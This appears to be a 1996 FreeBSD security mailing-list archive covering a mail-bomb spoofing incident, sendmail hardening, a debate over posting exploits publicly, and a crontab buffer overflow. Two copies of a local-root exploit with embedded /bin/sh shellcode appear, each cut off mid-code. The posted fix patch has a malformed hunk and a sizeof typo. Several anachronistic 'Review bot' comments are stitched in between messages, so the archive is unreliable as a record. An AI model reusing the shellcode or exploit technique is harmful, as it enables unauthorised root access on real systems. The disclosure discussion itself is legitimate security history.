From owner-freebsd-security Mon Dec 16 00:46:31 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id AAA13089 for security-outgoing; Mon, 16 Dec 1996 00:46:31 -0800 (PST) Received: from ns.cs.hku.hk (ns.cs.hku.hk [147.8.178.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id AAA13084 for ; Mon, 16 Dec 1996 00:46:26 -0800 (PST) Received: from champion (champion.cs.hku.hk) by ns.cs.hku.hk with SMTP id AA01300 (5.67b/IDA-1.5 for ) Mon, 16 Dec 1996 16:45:21 +0800 Received: by champion (4.1/S2.0-sunos4) id AA01860; Mon, 16 Dec 96 16:45:04 HKT Date: Mon, 16 Dec 1996 16:45:03 +0800 (HKT)
From: Doug Kwan ~{9XUq5B~} To: Petri Helenius Cc: security@freebsd.org Subject: Re: mail bomb! In-Reply-To: <199612160617.IAA03360@silver.sms.fi> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Hello Pete,

On Mon, 16 Dec 1996, Petri Helenius wrote:

> Have you ever considered using PGP signatures to verify the
> authenticity of your postings? If the necessity of verifying the
> signature were communicated at signup time, it would be the 'user's
> fault' if he/she believed the message without verifying it.

Most ISPs have customers who are not computer gurus. Asking them to use PGP to verify all our messages would not be a good idea. Anyway we would take your advice to digitally sign all our messages.

Thanx

-Doug

From owner-freebsd-security Mon Dec 16 02:06:14 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA16129 for security-outgoing; Mon, 16 Dec 1996 02:06:14 -0800 (PST) Received: from xkis.kis.ru (root@xkis.kis.ru [194.87.66.200]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA16120 for ; Mon, 16 Dec 1996 02:06:06 -0800 (PST) Received: from localhost (dv@localhost) by xkis.kis.ru (8.8.3/8.8.3) with SMTP id NAA14434 for ; Mon, 16 Dec 1996 13:04:33 +0300 (MSK) Date: Mon, 16 Dec 1996 13:04:33 +0300 (MSK)
From: Dmitry Valdov To: freebsd-security@freebsd.org Subject: crontab security hole exploit Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Hello!

Exploit for buffer overflow in crontab.

/* ---------------------------- CUT HERE ----------------------------------- */
/*                                                                           */
/* Hi !                                                                      */
/* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0).          */
/* If you have any problems with it, drop me a letter.                       */
/* Have fun !                                                                */
/*                                                                           */
/*                                                                           */
/*                        ----------------------                             */
/*             ---------------------------------------------                 */
/*    ----------------- Dedicated to my beautiful lady ------------------    */
/*             ---------------------------------------------                 */
/*                        ----------------------                             */
/*                                                                           */
/* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su                */

#include
main()
{
#define length 353
  int i,j;
  unsigned long start_addr;
  char *env[]={NULL};
  char param_string[length];
  char code_string[]=
  {
    "\xeb\x2a"                       /* jmp cont                  */
    /* geteip: */
    "\x5d"                           /* popl %ebp                 */
    "\x55"                           /* pushl %ebp                */
    "\xfe\x4d\xe7"                   /* decb 0xffffffe7(%ebp)     */
    "\xfe\x4d\xeb"                   /* decb 0xffffffeb(%ebp)     */
    "\xfe\x4d\xec"                   /* decb 0xffffffec(%ebp)     */
    "\xfe\x4d\xed"                   /* decb 0xffffffed(%ebp)     */
    "\xff\x45\xef"                   /* incl 0xffffffef(%ebp)     */
    "\xfe\x4d\xf4"                   /* decb 0xfffffff4(%ebp)     */
    "\xc3"                           /* ret                       */
    /* 0xffffffe0(%ebp): */
    "/bin/sh"
    /* 0xffffffe7(%ebp): */
    "\x01"
    /* execve: */
    "\x8d\x05\x3b\x01\x01\x01"       /* leal 0x3b,%eax            */
    "\x9a\xff\xff\xff\xff\x07\x01"   /* lcall 0x7,0x0             */
    /* cont: */
    "\xc7\xc4XXXX"                   /* movl $0xXXXXXXXX,%esp     */
    "\xe8\xcb\xff\xff\xff"           /* call geteip               */
    "\x81\xc5\xef\xff\xff\xff"       /* addl $0xffffffef,%ebp     */
    "\x55"                           /* pushl %ebp                */
    "\x55"                           /* pushl %ebp                */
    "\x81\xc5\xf1\xff\xff\xff"       /* addl $0xfffffff1,%ebp     */
    "\x55"                           /* pushl %ebp                */
    "\xe8\xd4\xff\xff\xff"           /* call execve               */
  };
  for(i=0;i

Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA17929 for security-outgoing; Mon, 16 Dec 1996 02:44:43 -0800
(PST) Received: from silver.sms.fi (root@silver.sms.fi [194.111.122.17]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA17916 for ; Mon, 16 Dec 1996 02:44:39 -0800 (PST) Received: (from pete@localhost) by silver.sms.fi (8.7.6/8.7.3) id MAA03828; Mon, 16 Dec 1996 12:44:20 +0200 (EET) Date: Mon, 16 Dec 1996 12:44:20 +0200 (EET) Message-Id: <199612161044.MAA03828@silver.sms.fi> 
From: Petri Helenius To: Doug Kwan ~{9XUq5B~} Cc: security@freebsd.org Subject: Re: mail bomb! In-Reply-To: References: <199612160617.IAA03360@silver.sms.fi> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Doug Kwan ~{9XUq5B~} writes:

> Hello Pete,
>
> On Mon, 16 Dec 1996, Petri Helenius wrote:
>
> > Have you ever considered using PGP signatures to verify the
> > authenticity of your postings? If the necessity of verifying the
> > signature were communicated at signup time, it would be the 'user's
> > fault' if he/she believed the message without verifying it.
>
> Most ISPs have customers who are not computer gurus. Asking them
> to use PGP to verify all our messages would not be a good idea. Anyway
> we would take your advice to digitally sign all our messages.
>

My message could have been misunderstood as saying that the misunderstanding should be blamed on the customers. However, this was not my intention. The idea was to give proper ammunition to the customers that do care and know how to do the trick. Maybe as a side-effect more of the world would grow authenticity-aware. Today, too many people believe what they read is authentic without actually giving any thought to the possibility of a forgery.
Pete From owner-freebsd-security Mon Dec 16 03:47:23 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id DAA20725 for security-outgoing; Mon, 16 Dec 1996 03:47:23 -0800 (PST) Received: from whale.gu.kiev.ua (whale.gu.net [194.93.190.4]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id DAA20710 for ; Mon, 16 Dec 1996 03:47:04 -0800 (PST) Received: from creator.gu.kiev.ua (stesin@creator.gu.kiev.ua [194.93.190.3]) by whale.gu.kiev.ua (8.7.5/8.7.3) with ESMTP id NAA56002 for ; Mon, 16 Dec 1996 13:46:58 +0200 X-Received: from brimstone (brimstone.netspace.org [128.148.157.143]) by creator.gu.kiev.ua with ESMTP id BAA24287 for ; Sun, 15 Dec 1996 01:19:29 +0200 X-Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <33614-4514>; Sat, 14 Dec 1996 18:18:59 -0500 X-Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id SAA26868; Sat, 14 Dec 1996 18:06:11 -0500 X-Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 1868880 for BUGTRAQ@NETSPACE.ORG; Sat, 14 Dec 1996 17:57:08 -0500 X-Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id RAA26060 for ; Sat, 14 Dec 1996 17:56:27 -0500 Approved-By: ALEPH1@UNDERGROUND.ORG X-Received: from leshka.chuvashia.su (leshka.chuvashia.su [194.58.212.226]) by netspace.org (8.8.2/8.8.2) with ESMTP id RAA22400 for ; Sat, 14 Dec 1996 17:23:38 -0500 X-Received: (from leshka@localhost) by leshka.chuvashia.su (8.8.3/8.8.3) id BAA00961; Sun, 15 Dec 1996 01:24:02 +0300 (MSK) Approved-By: Leshka Zakharoff Message-ID: <199612142224.BAA00961@leshka.chuvashia.su> Date: Sun, 15 Dec 1996 01:24:02 +0300 Reply-To: Leshka Zakharoff 
From: Leshka Zakharoff Subject: Exploit for crontab bug (FreeBSD 2.1.0). X-To: best-of-security@suburbia.net To: Multiple recipients of list BUGTRAQ ReSent-Date: Mon, 16 Dec 1996 13:45:48 +0200 (EET) ReSent-From: Andrew Stesin ReSent-To: security@freebsd.org ReSent-Message-ID: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

/* ---------------------------- CUT HERE ----------------------------------- */
/*                                                                           */
/* Hi !                                                                      */
/* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0).          */
/* If you have any problems with it, drop me a letter.                       */
/* Have fun !                                                                */
/*                                                                           */
/*                                                                           */
/*                        ----------------------                             */
/*             ---------------------------------------------                 */
/*    ----------------- Dedicated to my beautiful lady ------------------    */
/*             ---------------------------------------------                 */
/*                        ----------------------                             */
/*                                                                           */
/* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su                */

#include
main()
{
#define length 353
  int i,j;
  unsigned long start_addr;
  char *env[]={NULL};
  char param_string[length];
  char code_string[]=
  {
    "\xeb\x2a"                       /* jmp cont                  */
    /* geteip: */
    "\x5d"                           /* popl %ebp                 */
    "\x55"                           /* pushl %ebp                */
    "\xfe\x4d\xe7"                   /* decb 0xffffffe7(%ebp)     */
    "\xfe\x4d\xeb"                   /* decb 0xffffffeb(%ebp)     */
    "\xfe\x4d\xec"                   /* decb 0xffffffec(%ebp)     */
    "\xfe\x4d\xed"                   /* decb 0xffffffed(%ebp)     */
    "\xff\x45\xef"                   /* incl 0xffffffef(%ebp)     */
    "\xfe\x4d\xf4"                   /* decb 0xfffffff4(%ebp)     */
    "\xc3"                           /* ret                       */
    /* 0xffffffe0(%ebp): */
    "/bin/sh"
    /* 0xffffffe7(%ebp): */
    "\x01"
    /* execve: */
    "\x8d\x05\x3b\x01\x01\x01"       /* leal 0x3b,%eax            */
    "\x9a\xff\xff\xff\xff\x07\x01"   /* lcall 0x7,0x0             */
    /* cont: */
    "\xc7\xc4XXXX"                   /* movl $0xXXXXXXXX,%esp     */
    "\xe8\xcb\xff\xff\xff"           /* call geteip               */
    "\x81\xc5\xef\xff\xff\xff"       /* addl $0xffffffef,%ebp     */
    "\x55"                           /* pushl %ebp                */
    "\x55"                           /* pushl %ebp                */
    "\x81\xc5\xf1\xff\xff\xff"       /* addl $0xfffffff1,%ebp     */
    "\x55"                           /* pushl %ebp                */
    "\xe8\xd4\xff\xff\xff"           /* call execve               */
  };
  for(i=0;i

Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id
EAA21482 for security-outgoing; Mon, 16 Dec 1996 04:03:10 -0800 (PST) Received: from shadows.aeon.net (bsdsec@shadows.aeon.net [194.100.41.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id EAA21477 for ; Mon, 16 Dec 1996 04:03:05 -0800 (PST) Received: (from bsdsec@localhost) by shadows.aeon.net (8.8.4/8.8.3) id OAA11649; Mon, 16 Dec 1996 14:01:55 +0200 (EET) 
From: mika ruohotie Message-Id: <199612161201.OAA11649@shadows.aeon.net> Subject: Re: mail bomb! To: ctkwan@cs.hku.hk (Doug Kwan ~{9XUq5B~}) Date: Mon, 16 Dec 1996 14:01:55 +0200 (EET) Cc: cschuber@uumail.gov.bc.ca, security@freebsd.org In-Reply-To: from Doug Kwan ~{9XUq5B~} at "Dec 16, 96 10:47:01 am" X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

> On Sun, 15 Dec 1996, Cy Schubert - ITSD Open Systems Group wrote:
> Unfortunately, that jerk uses a fake e-mail address. He sent mail
> in our support account's name. We cannot filter mails from our
> support account.

you are using sendmail, right?

you should at least have this in your /etc/sendmail.cf

O PrivacyOptions=authwarnings,needmailhelo,needexpnhelo,novrfy

and then run it with loglevel 12, that should at least help you in tracking down where he's connecting from, assuming you have no clue.

but still, the administrative messages should _always_ be authenticated.

> -Doug

mickey
--
mika ruohotie mika@aeon.net

From owner-freebsd-security Mon Dec 16 05:03:18 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA26682 for security-outgoing; Mon, 16 Dec 1996 05:03:18 -0800 (PST) Received: from relay1.sw.ru (myth.sw.ru [194.190.197.129]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id FAA26671 for ; Mon, 16 Dec 1996 05:02:57 -0800 (PST) Received: from zeus by relay1.sw.ru (8.8.4/8.8.4/jt) with SMTP id QAA00691 for ; Mon, 16 Dec 1996 16:01:59 +0300 (MSK) Message-Id: <3.0.32.19961216161045.00905ed0@myth.sw.ru> X-Url: http://www.sw.ru/~jt X-Sender: jt@myth.sw.ru X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Mon, 16 Dec 1996 16:10:46 +0300 To: security@freebsd.org
From: Juri Tsibrovski Subject: Re: mail bomb! Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk At 21:43 15.12.96 +0100, Ollivier Robert wrote: >According to Cy Schubert - ITSD Open Systems Group: >> I've used the following to ban known advertisers to my desktop Alpha >> at work. Someone had posted it on BUGTRAQ about six months ago and >> unfurtunately I cannot remember his name. > >8.8.4 has also the check_compat rules to filter mails. It doesn't appear to >be really documented... There is a good page explaining these anti-spam features in sendmail 8.8: http://www.informatik.uni-kiel.de/%7Eca/email/check.html --- jt -- just typist :) From owner-freebsd-security Mon Dec 16 05:27:50 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA29035 for security-outgoing; Mon, 16 Dec 1996 05:27:50 -0800 (PST) Received: from eel.dataplex.net (eel.dataplex.net [208.2.87.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id FAA29028 for ; Mon, 16 Dec 1996 05:27:48 -0800 (PST) Received: from [208.2.87.4] (cod [208.2.87.4]) by eel.dataplex.net (8.7.5/8.7.3) with ESMTP id HAA23928; Mon, 16 Dec 1996 07:27:56 -0600 (CST) X-Sender: rkw@mail.dataplex.net Message-Id: In-Reply-To: <32b5c1243534002@molhub.mol.net.my> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 16 Dec 1996 07:17:20 -0600 To: Mun Fai WONG 
From: Richard Wackerbarth Subject: Re: FreeBSD vs BorderWare Cc: security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >1) It is based on a secured OS phillosophy >2) It is "commercially" backed by the vendor >3) It has been tested >4) Availability of the source to the modified kernel is impossible compared >to FreeBSD as FreeBSD is a very "open" software distribution with source >codes freely available. "Security through Obscurity" is a very false sense of security. It also leaves you at the mercy of the vendor. Sometimes, "commercial" support is worse than no support. There are a number of individuals/companies who will be happy to provide support-for-hire for FreeBSD. With FreeBSD you have the added advantage that you have support options. You can do it yourself with lots of help on the net. You can also hire someone for support. And if you are not pleased with them, you can select another. From owner-freebsd-security Mon Dec 16 05:27:59 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA29059 for security-outgoing; Mon, 16 Dec 1996 05:27:59 -0800 (PST) Received: from eel.dataplex.net (eel.dataplex.net [208.2.87.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id FAA29053 for ; Mon, 16 Dec 1996 05:27:57 -0800 (PST) Received: from [208.2.87.4] (cod [208.2.87.4]) by eel.dataplex.net (8.7.5/8.7.3) with ESMTP id HAA23931; Mon, 16 Dec 1996 07:28:02 -0600 (CST) X-Sender: rkw@mail.dataplex.net Message-Id: In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 16 Dec 1996 07:27:15 -0600 To: Dmitry Valdov 
From: Richard Wackerbarth Subject: Re: crontab security hole exploit Cc: security@FreeBSD.ORG Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk >Hello! > >Exploit for buffer overflow in crontab. > > >/* ---------------------------- CUT HERE >----------------------------------- */ Please do not post exploit details to the list. The details can be sent privately to security-officer@FreeBSD.ORG. Observations that they exist, preferably with impact statements (eg. user can gain root access) and proposed fixes are appropriate for public notice. From owner-freebsd-security Mon Dec 16 05:55:15 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA02605 for security-outgoing; Mon, 16 Dec 1996 05:55:15 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id FAA02589; Mon, 16 Dec 1996 05:55:11 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id GAA06048; Mon, 16 Dec 1996 06:53:44 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id GAA07865; Mon, 16 Dec 1996 06:51:33 -0700 (MST) Date: Mon, 16 Dec 1996 06:51:33 -0700 (MST) 
From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Dmitry Valdov cc: freebsd-bugs@freebsd.org, freebsd-security@freebsd.org Subject: Re: crontab security hole In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 16 Dec 1996, Dmitry Valdov wrote: > Hello! > > Are there any fixes for crontab? I've exploit which allow any user to become > root using crontab security hole. > > Dmitry. > It was fixed in -stable the other day by pst. The patch, pulled from the CVS tree, follows. Index: cron/database.c =================================================================== RCS file: /usr/cvs/src/usr.sbin/cron/cron/database.c,v retrieving revision 1.1.1.1 retrieving revision 1.1.1.1.6.1 diff -c -r1.1.1.1 -r1.1.1.1.6.1 *** database.c 1994/08/27 13:43:03 1.1.1.1 --- database.c 1996/12/15 20:37:47 1.1.1.1.6.1 *************** *** 112,119 **** if (dp->d_name[0] == '.') continue; ! (void) strcpy(fname, dp->d_name); ! sprintf(tabname, CRON_TAB(fname)); process_crontab(fname, fname, tabname, &statbuf, &new_db, old_db); --- 112,119 ---- if (dp->d_name[0] == '.') continue; ! (void)snprintf(fname, sizeof fname, "%s", dp->d_name); ! (void)snprintf(tabname, sizeof tabname, CRON_TAB(fname)); process_crontab(fname, fname, tabname, &statbuf, &new_db, old_db); Index: crontab/crontab.c =================================================================== RCS file: /usr/cvs/src/usr.sbin/cron/crontab/crontab.c,v retrieving revision 1.3.4.1 retrieving revision 1.3.4.2 diff -c -r1.3.4.1 -r1.3.4.2 *** crontab.c 1996/04/09 21:23:11 1.3.4.1 --- crontab.c 1996/12/15 20:37:59 1.3.4.2 *************** *** 17,23 **** *************** *** 167,173 **** ProgramName, optarg); exit(ERROR_EXIT); } ! (void) strcpy(User, optarg); break; case 'l': if (Option != opt_unknown) --- 167,173 ---- ProgramName, optarg); exit(ERROR_EXIT); } ! 
(void) snprintf(User, sizeof(user), "%s", optarg); break; case 'l': if (Option != opt_unknown) *************** *** 198,204 **** } else { if (argv[optind] != NULL) { Option = opt_replace; ! (void) strcpy (Filename, argv[optind]); } else { usage("file name must be specified for replace"); } --- 198,205 ---- } else { if (argv[optind] != NULL) { Option = opt_replace; ! (void) snprintf(Filename, sizeof(Filename), "%s", ! argv[optind]); } else { usage("file name must be specified for replace"); } *************** *** 480,486 **** ProgramName, Filename); goto done; default: ! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n"); goto fatal; } remove: --- 481,488 ---- ProgramName, Filename); goto done; default: ! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n", ! ProgramName); goto fatal; } remove: From owner-freebsd-security Mon Dec 16 06:56:41 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id GAA10501 for security-outgoing; Mon, 16 Dec 1996 06:56:41 -0800 (PST) Received: from xinit.se (root@vampire.xinit.se [194.14.168.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id GAA10496 for ; Mon, 16 Dec 1996 06:56:38 -0800 (PST) Received: from lich (lich.xinit.se [194.14.168.2]) by xinit.se (8.7.3/8.7.4) with SMTP id PAA13094; Mon, 16 Dec 1996 15:55:54 +0100 (MET) Date: Mon, 16 Dec 1996 15:55:59 +0100 (MET) 
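Review bot: the two snprintf() calls in the database.c hunk bound the copies but discard the return value, so a directory entry longer than fname (or a spool path longer than tabname) is silently truncated and process_crontab() is then called on a name that is not the one found in the directory; compare the return value with sizeof fname / sizeof tabname and skip the entry when it does not fit. Also confirm that CRON_TAB(fname) expands to a constant format string plus arguments, since it is passed as the format parameter here just as it was to sprintf() before.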
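Review bot: in the crontab.c part, the hunk header "*** 17,23 ****" is immediately followed by the "*** 167,173 ****" header with no body lines, which is not a valid context-diff hunk, so patch(1) will stop at it. Drop the "***************" and "*** 17,23 ****" lines (the hunk they belonged to was removed by hand) so the file applies cleanly.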
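Review bot: the 167,173 hunk's replacement line uses sizeof(user) while the destination buffer is User; unless a lowercase user object exists in crontab.c this will not compile, and if one exists as a pointer the bound becomes the pointer size rather than the buffer size. Use sizeof(User), matching the sizeof(Filename) form in the following hunk.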
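Review bot: in the 198,204 hunk the snprintf() into Filename has its return value cast to void, so a path longer than the buffer is silently shortened and crontab then opens a different file than the one named on the command line; compare the return value with sizeof(Filename) and exit with ERROR_EXIT when it does not fit, as the surrounding option handling already does for other argument errors.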
From: Joakim Rastberg
To: Richard Wackerbarth
cc: Dmitry Valdov, security@FreeBSD.ORG
Subject: Re: crontab security hole exploit

On Mon, 16 Dec 1996, Richard Wackerbarth wrote:

>>Exploit for buffer overflow in crontab.
>Please do not post exploit details to the list. The details can be sent
>privately to security-officer@FreeBSD.ORG.
>Observations that they exist, preferably with impact statements (eg. user
>can gain root access) and proposed fixes are appropriate for public notice.

Is that official? Or only wishful thinking (ie if no one posts them they
will go away?). I would rather like the exploits to be posted, as they can
be used to leverage the "management" to pay attention (background: I am
working as a contractor to run some unix-boxes and although I whine about
the low security *nothing* happens until I can show I get a #, then someone
perhaps pulls the plug and pays for a more secure installation. My point
being that many companies, at least the ones I work for, IGNORE holes
until someone has shown them the exploit)

/joakim rastberg, Xinit AB, Sundsvall Sweden.
From owner-freebsd-security Mon Dec 16 06:58:10 1996
To: Marc Slemko
cc: Dmitry Valdov, freebsd-bugs@freebsd.org, freebsd-security@freebsd.org
Subject: Re: crontab security hole
In-reply-to: Your message of "Mon, 16 Dec 1996 06:51:33 MST."
Date: Mon, 16 Dec 1996 06:57:12 -0800
From: Jason Downs Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message , Marc Slemko writes: >On Mon, 16 Dec 1996, Dmitry Valdov wrote: > >> Hello! >> >> Are there any fixes for crontab? I've exploit which allow any user to become >> root using crontab security hole. >> >> Dmitry. >> > >It was fixed in -stable the other day by pst. The patch, pulled >from the CVS tree, follows. Haven't any of you ever heard of a very simple and efficient non-stdio routine called, of all things, strncpy()? It's been around for, like, ever. >Index: cron/database.c >=================================================================== >RCS file: /usr/cvs/src/usr.sbin/cron/cron/database.c,v >retrieving revision 1.1.1.1 >retrieving revision 1.1.1.1.6.1 >diff -c -r1.1.1.1 -r1.1.1.1.6.1 >*** database.c 1994/08/27 13:43:03 1.1.1.1 >--- database.c 1996/12/15 20:37:47 1.1.1.1.6.1 >*************** >*** 112,119 **** > if (dp->d_name[0] == '.') > continue; > >! (void) strcpy(fname, dp->d_name); >! sprintf(tabname, CRON_TAB(fname)); > > process_crontab(fname, fname, tabname, > &statbuf, &new_db, old_db); >--- 112,119 ---- > if (dp->d_name[0] == '.') > continue; > >! (void)snprintf(fname, sizeof fname, "%s", dp->d_name); >! (void)snprintf(tabname, sizeof tabname, CRON_TAB(fname)); > > process_crontab(fname, fname, tabname, > &statbuf, &new_db, old_db); >Index: crontab/crontab.c >=================================================================== >RCS file: /usr/cvs/src/usr.sbin/cron/crontab/crontab.c,v >retrieving revision 1.3.4.1 >retrieving revision 1.3.4.2 >diff -c -r1.3.4.1 -r1.3.4.2 >*** crontab.c 1996/04/09 21:23:11 1.3.4.1 >--- crontab.c 1996/12/15 20:37:59 1.3.4.2 >*************** >*** 17,23 **** >*************** >*** 167,173 **** > ProgramName, optarg); > exit(ERROR_EXIT); > } >! (void) strcpy(User, optarg); > break; > case 'l': > if (Option != opt_unknown) >--- 167,173 ---- > ProgramName, optarg); > exit(ERROR_EXIT); > } >! 
(void) snprintf(User, sizeof(user), "%s", optarg); > break; > case 'l': > if (Option != opt_unknown) >*************** >*** 198,204 **** > } else { > if (argv[optind] != NULL) { > Option = opt_replace; >! (void) strcpy (Filename, argv[optind]); > } else { > usage("file name must be specified for replace"); > } >--- 198,205 ---- > } else { > if (argv[optind] != NULL) { > Option = opt_replace; >! (void) snprintf(Filename, sizeof(Filename), "%s", >! argv[optind]); > } else { > usage("file name must be specified for replace"); > } >*************** >*** 480,486 **** > ProgramName, Filename); > goto done; > default: >! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n"); > goto fatal; > } > remove: >--- 481,488 ---- > ProgramName, Filename); > goto done; > default: >! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n", >! ProgramName); > goto fatal; > } > remove: > > -- Jason Downs (503) 256-8535 -/- (503) 952-3749 downsj@teeny.org --> teeny.org: Free Software for a Free Internet <-- http://www.teeny.org/ This ain't no steeenking NetBSD. http://www.openbsd.org/ From owner-freebsd-security Mon Dec 16 07:18:36 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA11558 for security-outgoing; Mon, 16 Dec 1996 07:18:36 -0800 (PST) Received: from eel.dataplex.net (eel.dataplex.net [208.2.87.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA11553 for ; Mon, 16 Dec 1996 07:18:34 -0800 (PST) Received: from [208.2.87.4] (cod [208.2.87.4]) by eel.dataplex.net (8.7.5/8.7.3) with ESMTP id JAA15179; Mon, 16 Dec 1996 09:18:49 -0600 (CST) X-Sender: rkw@mail.dataplex.net Message-Id: In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 16 Dec 1996 09:14:25 -0600 To: Joakim Rastberg 
From: Richard Wackerbarth
Subject: Re: crontab security hole exploit
Cc: security@FreeBSD.ORG

jor@xinit.se writes:

>I would rather like the exploits to be posted, as they can be used
>to leverage the "management" to pay attention (background: I am working as
>a contractor to run some unix-boxes and although I whine about the low
>security *nothing* happens until I can show I get a #, then someone
>perhaps pulls the plug and pays for a more secure installation. My point
>being that many companies, at least the ones I work for, IGNORE holes
>until someone has shown them the exploit)

An interesting perspective.
My attitude is that it is better to have obscurity than having the exploit
readily available to a wide audience. I realize that the truly good
crackers can figure it out for themselves. But there are many "children" who
will try something when it is handed to them. IMHO, we should at least give
the upper hand to the sysops and, if possible, provide the fix before the
attack becomes widespread.

From owner-freebsd-security Mon Dec 16 07:30:33 1996
Date: Mon, 16 Dec 1996 15:34:21 GMT
From: Peter Radcliffe
To: marcs@znep.com
Subject: Re: crontab security hole
Cc: freebsd-bugs@freebsd.org, freebsd-security@freebsd.org

> It was fixed in -stable the other day by pst. The patch, pulled
> from the CVS tree, follows.

Yes, but trying to apply that patch to this 2.1.5 box gives me:

--------------------------
Patching file crontab/crontab.c using Plan A...
patch: **** unexpected end of hunk at line 38
--------------------------

Peter.

From owner-freebsd-security Mon Dec 16 07:45:44 1996
Date: Mon, 16 Dec 1996 23:44:54 +0800 (HKT)
From: Doug Kwan
To: mika ruohotie
Cc: security@freebsd.org
Subject: Re: mail bomb!

Hi,

On Mon, 16 Dec 1996, mika ruohotie wrote:

> you are using sendmail, right?
>
> you should at least have this in your /etc/sendmail.cf
>
> O PrivacyOptions=authwarnings,needmailhelo,needexpnhelo,novrfy
>
> and then run it with loglevel 12, that should at least help you from
> tracking down from where he's connecting, assuming you have no clue.

Our mail daemon always logs the IP address of the incoming mails, but that
bastard uses relaying hosts. So if the relaying hosts do not log the IP
address of the mail source we cannot trace the origin. We have to contact
the administrators of the relaying hosts for information. Some are willing
to help but not all.

Typically, what we do now is to set our routers to stop all traffic between
us and a relaying host. Now all the spam mails will be stuck in the relaying
host. We will send a warning message to the administrator there via another
channel telling him/her to clean the outgoing mail queue before it is too
late.

> but still, the administrative messages should _always_ be authenticated.

Will do. Thanks

-Doug

From owner-freebsd-security Mon Dec 16 08:03:41 1996
Date: 16 Dec 1996 16:04:28 -0000
From: Oregon Ghost
To: security@freebsd.org
Subject: Re: crontab security hole exploit

The exploits are posted to several other quite public lists (bugtraq has
over 5000 subscribers now), so why not here? I should think it underscores
the fact that the security hole is exploitable with publicly available code.

Joakim Rastberg writes:
> On Mon, 16 Dec 1996, Richard Wackerbarth wrote:
>
> >>Exploit for buffer overflow in crontab.
> >Please do not post exploit details to the list. The details can be sent
> >privately to security-officer@FreeBSD.ORG.
> >Observations that they exist, preferably with impact statements (eg. user
> >can gain root access) and proposed fixes are appropriate for public notice.
>
> Is that official? Or only wishful thinking (ie if no one posts them they
> will go away?). I would rather like the exploits to be posted, as they can
> be used to leverage the "management" to pay attention (background: I am
> working as a contractor to run some unix-boxes and although I whine about
> the low security *nothing* happens until I can show I get a #, then someone
> perhaps pulls the plug and pays for a more secure installation. My point
> being that many companies, at least the ones I work for, IGNORE holes
> until someone has shown them the exploit)
>
> /joakim rastberg, Xinit AB, Sundsvall Sweden.
From owner-freebsd-security Mon Dec 16 08:54:45 1996
From: Adam Kubicki
Subject: why is -stable not secure?
